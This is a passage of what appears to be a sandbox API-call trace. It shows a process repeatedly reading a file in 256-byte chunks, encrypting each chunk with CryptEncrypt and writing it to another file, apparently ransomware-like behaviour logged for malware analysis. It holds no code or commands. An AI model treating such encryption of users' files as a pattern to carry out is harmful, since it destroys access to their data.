lpOverlapped=0x0) returned 1 [0168.308] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.308] GetLastError () returned 0x0 [0168.308] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.308] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.308] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.308] GetLastError () returned 0x0 [0168.308] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.309] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.309] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.309] GetLastError () returned 0x0 [0168.309] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.309] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.309] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.309] GetLastError () returned 0x0 [0168.309] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.309] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.309] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.309] GetLastError () returned 0x0 [0168.309] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.309] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.309] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.309] GetLastError () returned 0x0 [0168.309] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.309] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.309] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.309] GetLastError () returned 0x0 [0168.309] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.309] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.309] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.309] GetLastError () returned 0x0 [0168.309] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.309] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.310] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.310] GetLastError () returned 0x0 [0168.310] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.310] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.310] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.310] GetLastError () returned 0x0 [0168.310] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.310] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.310] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.310] GetLastError () returned 0x0 [0168.310] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.310] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.310] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.310] GetLastError () returned 0x0 [0168.310] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.310] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.310] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.310] GetLastError () returned 0x0 [0168.310] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.310] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.310] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.310] GetLastError () returned 0x0 [0168.310] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.310] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.310] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.310] GetLastError () returned 0x0 [0168.310] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.311] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.311] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.311] GetLastError () returned 0x0 [0168.311] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.311] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.311] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.311] GetLastError () returned 0x0 [0168.311] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.311] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.311] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.311] GetLastError () returned 0x0 [0168.311] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.311] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.311] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.311] GetLastError () returned 0x0 [0168.311] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.311] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.311] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.311] GetLastError () returned 0x0 [0168.311] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.311] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.311] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.311] GetLastError () returned 0x0 [0168.311] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.312] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.312] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.312] GetLastError () returned 0x0 [0168.312] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.312] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.312] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.312] GetLastError () returned 0x0 [0168.312] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.312] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.312] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.312] GetLastError () returned 0x0 [0168.312] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.312] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.312] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.312] GetLastError () returned 0x0 [0168.312] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.312] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.312] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.313] GetLastError () returned 0x0 [0168.313] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.313] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.313] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.313] GetLastError () returned 0x0 [0168.313] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.313] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.313] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.313] GetLastError () returned 0x0 [0168.313] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.313] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.313] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.313] GetLastError () returned 0x0 [0168.313] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.313] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.313] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.313] GetLastError () returned 0x0 [0168.313] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.313] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.314] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.314] GetLastError () returned 0x0 [0168.314] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.314] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.314] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.314] GetLastError () returned 0x0 [0168.314] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.314] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.314] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, 